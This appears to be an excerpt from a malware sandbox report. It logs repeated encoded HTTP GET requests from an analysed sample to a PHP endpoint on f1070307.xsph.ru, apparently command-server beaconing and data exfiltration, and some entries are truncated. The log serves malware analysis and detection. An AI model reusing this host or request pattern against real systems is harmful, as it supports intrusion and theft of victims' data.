Source: global traffic	HTTP traffic detected: GET /3b39b74d.php?CrX=gZ5mjnRizKIjk&376779f86c177c4b75812d1e24e5499c=91232e7e14c7cef9e28ece2cb253607d&6cf4e82f6b2961308157eadafeeff42f=gYldDNkNzM4MjZiVjM1ITN3gTYjRTMiN2Y5kTMlNTZ4M2M3Q2M3Q2M&CrX=gZ5mjnRizKIjk HTTP/1.1Accept: /Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: f1070307.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI1UmMkRWNxMmN2M2N4EGN0gjN5cjM3cTOhdjYwcTM3YjYwQTO0YWMxIiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W HTTP/1.1Accept: /Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: f1070307.xsph.ru
Source: global traffic	HTTP traffic detected: GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI2YWYiZDO4IGOklDZmZTOkNTZkhTMhJTYjZWNiZDO2MGNyMmZ2YWO4IiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W&7603066d178d57644cba1e85f0eb372c=QX9JiI6IiMjFWN0cjNkFzY3ATY0U2MiNTMlVDZmJmZhhTZ0gTYhJCLiYjZhJmN4gjY4QWOkZmN5Q2MlRGOxEmMhNmZ1ImN4YzY0IzYmZjZ5gjI6ICN3gDMhhjM4IzNhZmNmZmZ4QWY5gDMlJWOjhDMhVDOwICLiIGZxUTNxEGZ2UDN2QjZzcDM3gTOkJGZhJGMxgTOwMTMykjN0MjZwQmI6IyY3YTYxMDZxIWMkhDZiNGM0EjZ1cDM1ITOzQzMkRjM2Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplEbahVYw40VRl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVNBzZ65ENJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIzYhVDN3YDZxM2NwEGNlNjYzETZ1QmZiZWY4UGN4EWYiwiIkNjYyMTNmhzY2EjNkVmM3UWM1YzN3IzNmhDO0QWM1I2N2IjMhNzNzIiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W HTTP/1.1Accept: /Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: f1070307.xsph.ru
Source: global traffic	HTTP traffic detected: GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&7603066d178d57644cba1e85f0eb372c=0VfiIiOiIzYhVDN3YDZxM2NwEGNlNjYzETZ1QmZiZWY4UGN4EWYiwiI1MGO0MmZlJzMjRGOyITO5EWZkVTZiVTNhJzM1ETN3M2NzEWNkdjNmJiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W HTTP/1.1Accept: /Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: f1070307.xsph.ru
Source: global traffic	HTTP traffic detected: GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&55ca561fdd2e5f8b5033cd4b009e609b=QX9JSOKl2Ysp0MiNnQIVmR4ZEW6R2MitWNXFGW4ZEWwolMipXOtNmasdFVjhnRihmTyIWT4ZEWoJFWZVkQINmQ4ZEW6ZVbiZHcHh1YO52Ys5EWWNGes9ERKl2Tpd2RkhmQsl0cJlmYzkTbiJXNXZVavpWSvJFWZFlUtNmdOJzYwJ1aJNXSplkNJNUYwY0RVRnRtNmbWdkYsJFbJNXSplkNJl3Y3JEWRRnRXpFMOxWSzlUaiNTOtJmc1clVp9maJVEbrNGbOhlV0Z0VaBjTsl0cJlmYzkTbiJXNXZVavpWS5ZlMjZVMXlFbSNTVpdXaJVHZzIWd01mYWpUaPl2YtJGa4VlYoZ1RkRlSDxUa0IDZ2VjMhVnVslkNJNUYwY0RVRnRXpFMOxWSzl0UZJTSXlFdBR0TyklaOBTQql1N1MlZ3FERNdXQE10dBpGT4RzQNVXQ6VWavpWS6ZVbiZHaHNmdKNTWwFzaJNXSplkNJl3Y0ZkMZlmVyYVa3lWS1hHbjNmRUdlQ4VUVUxWRSNGesx0Y4ZEWjpUaPlWTuJGbW12Yq5EbJNXS5tEN0MkTp9maJVXOXFmeKhlWXRXbjZHZYpFdG12YHpUelJiOiIzYhVDN3YDZxM2NwEGNlNjYzETZ1QmZiZWY4UGN4EWYiwiI1MGO0MmZlJzMjRGOyITO5EWZkVTZiVTNhJzM1ETN3M2NzEWNkdjNmJiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W HTTP/1.1Accept: /Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: f1070307.xsph.ru
Source: global traffic	HTTP traffic detected: GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI1IDOzgTYyEWM1gTOkNWMiFWMiBjZ3YDZhV2YxM2NjlzNzcjNkNzNjJiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W HTTP/1.1Accept: /Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: f1070307.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI2YWYiZDO4IGOklDZmZTOkNTZkhTMhJTYjZWNiZDO2MGNyMmZ2YWO4IiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W&7603066d178d57644cba1e85f0eb372c=QX9JiI6IiMjFWN0cjNkFzY3ATY0U2MiNTMlVDZmJmZhhTZ0gTYhJCLiYjZhJmN4gjY4QWOkZmN5Q2MlRGOxEmMhNmZ1ImN4YzY0IzYmZjZ5gjI6ICN3gDMhhjM4IzNhZmNmZmZ4QWY5gDMlJWOjhDMhVDOwICLiIGZxUTNxEGZ2UDN2QjZzcDM3gTOkJGZhJGMxgTOwMTMykjN0MjZwQmI6IyY3YTYxMDZxIWMkhDZiNGM0EjZ1cDM1ITOzQzMkRjM2Iyes0nIwglZphjaJZTSD5UakRlWp50VahXTX5keZRUTzE1VPhXTtlFNZdkWwklaapXR61EbKRlT4NmaOh3ZqpFNjR0TpNnbPlWRHRGaSVEZ0YVbJNXVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVNBzZ65ENJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIzYhVDN3YDZxM2NwEGNlNjYzETZ1QmZiZWY4UGN4EWYiwiIkNjYyMTNmhzY2EjNkVmM3UWM1YzN3IzNmhDO0QWM1I2N2IjMhNzNzIiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W HTTP/1.1Accept: /Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: f1070307.xsph.ru
Source: global traffic	HTTP traffic detected: GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&7603066d178d57644cba1e85f0eb372c=0VfiIiOiIzYhVDN3YDZxM2NwEGNlNjYzETZ1QmZiZWY4UGN4EWYiwiI1UmMkRWNxMmN2M2N4EGN0gjN5cjM3cTOhdjYwcTM3YjYwQTO0YWMxIiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W HTTP/1.1Accept: /Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: f1070307.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&55ca561fdd2e5f8b5033cd4b009e609b=QX9JyZUZTUYp1c4dVWYJUeiBjQYVWeOVUS6Z0RTtEMnRlNRhlWzh3VZhlQTFmdKNjYaBXUE9EcERGb4dkYoRmRJlmVyY1Z0ADVVBXUE9EcERGb4dkYoRmRJRXOHRWdGdUYRBXUE9EcERGb4dkYoRmRJlmVyY1ZVJTW1ZUbiBnSrNkT0s2TwY1RiNnRyY1Z0cVY1lTbVtEMnRlNRhlWzh3VZhlQ5FWdsdEV1lTbjVFcRR0TwREZsh3RihGZGlkcOhVWOZ0RkxWMrNkT0s2TwY1RiNnRyY1ZnJzYo5UbXtEMnRlNRhlWzh3VZhlQ5JWeW1mY2FzaD5ENr9EMWdkYzZkMWdWVtNmdOtmYwljMZxmUYFWTwFFRPBHRkxGeHJGakZUS6ZFSaZHaYJ1SwcGV2EFWaNHeXlFWCNlYxYVbjxGaHRmRwFFRPBHRkxGeHJGakZUS0ZlbjBjTXp1cWt2QORzaPBjVHJ2cGJjVnVVbjZnTFFmeGdkULBzZUZTUYp1c4dVWYJUaiBXOykFbShVZDBXUE9EcERGb4dkYoRmRJxmSzIGR1cVY250RkBnSrNkT0s2TwY1RiNnRyY1ZNdVY0lzRkJEcRR0TwREZsh3RihGZGlUNKNjY0pEWRtEMnRlNRhlWzh3VZhlQTpla1cVW1xWbRJiOiIzYhVDN3YDZxM2NwEGNlNjYzETZ1QmZiZWY4UGN4EWYiwiI1UmMkRWNxMmN2M2N4EGN0gjN5cjM3cTOhdjYwcTM3YjYwQTO0YWMxIiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W HTTP/1.1Accept: /Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: f1070307.xsph.ru
Source: global traffic	HTTP traffic detected: GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI2YWYiZDO4IGOklDZmZTOkNTZkhTMhJTYjZWNiZDO2MGNyMmZ2YWO4IiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W&7603066d178d57644cba1e85f0eb372c=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
Source: global traffic	HTTP traffic detected: GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI2YWYiZDO4IGOklDZmZTOkNTZkhTMhJTYjZWNiZDO2MGNyMmZ2YWO4IiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W&7603066d178d57644cba1e85f0eb372c=QX9JiI6IiMjFWN0cjNkFzY3ATY0U2MiNTMlVDZmJmZhhTZ0gTYhJCLiYjZhJmN4gjY4QWOkZmN5Q2MlRGOxEmMhNmZ1ImN4YzY0IzYmZjZ5gjI6ICN3gDMhhjM4IzNhZmNmZmZ4QWY5gDMlJWOjhDMhVDOwICLiIGZxUTNxEGZ2UDN2QjZzcDM3gTOkJGZhJGMxgTOwMTMykjN0MjZwQmI6IyY3YTYxMDZxIWMkhDZiNGM0EjZ1cDM1ITOzQzMkRjM2Iyes0nIRZWOKlGVp9maJBTVq5kaKJTTqJ1ROxmVU5kMJd0TppkaNxGZUlVNrRlW3lkeOlmWX10MrRVW0EkaZNzaq5EeJNETpRzaJZTSD9UeRJTWxEleZp3aUllaCRVW3FleZVTQEpVbWdVT4V0RNh3ZUl1dZJjTwUVbOhmRXlFNFpmWpdXaJ9kSp9UaJdkTrp0VPdXTtpFaOd1TxUlMNxmV61EaSdlWqJ1VZtmSqpVNFR1ToplaaNTSX5UaOpWW5lVbJNXSpRVavpWSt5kaaxmSqp1aO1mW1cmaZlmQq10aGdVW3VlMONzZ6lFeJdkW5lERPFTSX1UNnpWTxEFRNlmSDxUa0sWS2k0UPhmRt5EeBRlTtxGVaNzZ65ENZpWW0k1RPFTVqpleVdVTxsmaOBzZU9UeFpmTykEROhmVy0Ua3lWSPpUaPlWVt1UbSRUT610VNdXVyk1akRlTzkkaOhmWH1UboR0TxkFVZNTSH9UeBpWW4lEVOlXTE1UbKpWSzlUaUl2bqlEakRkTyMGVORzaE5UNZpXWtZERPpmRE10aCpWTzUkMOpXTUllMnRlT1UUbZVza65UMRRkWpp0QMlGNrlkNJNVTsZFVOlmQUllMZRVTycGVZh3aU50MNd1T3lEROpXWE5UaCpnTsZEVNlXSq50MVRUTxk1VOl2dpl0TKl2TplERPp3Z61UMBRUToxmaZtmWt50dNd0T1E1VNhGaUl1aadUTpp1VapXRtl1dZJTWsJVbNVTSql0cJlGVp9maJBTRql1dFdkWpRGROVTUU5EbGRVTtZlMZp3aU90dZpWWtZ1RN1mTU5UMJRkW5FVbNdXTE10MJNETpRzaJZTSp5EaKpmWykFROpXUUpleZ1mT4tGRPtmSU5kMNdlW00ERalmRE5EeFdVT4dGRaBTVt5EasRlTpdXaJ9kSp9UajRlTxE1RPpXW61EaGR0ToZkeOlXRU5UbSdUTwElMOtmSH9UerpXT00kaalXRt1ENNRlWzElaJNXSpRVavpWS0EEVZlmTH1ENJpXWyEFVORzY6llaapWW1UFVNFTUq50dV1mTzUFVZRTVX9UaspnT4VkMZBTSDxUa0sWS2kUaZxmRXlFNnpWW3FEVZtGZ65UaSRUToZ1RONTTU9kMJRVT5lEVOhmWU5EeVRkWrZ1VOJTRtpVa3lWSPpUaPlWWE5EaGdVWqZkeONTSt50dNdkT3tmaNVTRq5UNJR0ToRGVNhmWXpFNRdkT5VlaNhXUykVeV1WSzlUaUl2bqlUeZRVTo5keZhmSE1UaOdUTyE1VahmRH9keNpmWrxGVPpXQql1dJpmWzcGRNxmUq10dRdlWpp0QMlGNrlkNJlXT3llMOlmTyk1djRkT6lkaaFTVtpFNBRkWpZleNdXUX5UeFR0T1EkaNhXTykFbCpmT6NmaOl2dpl0TKl2TpFVbNhmTH10MZdkW4tmeZl3Z6l1dNdlT310RPhGZq1kerpmWtJleONTVX5EMVR1Tq5kaZlmRql0cJlGVp9maJFTSEpFbOJTW5FFVNhmRU5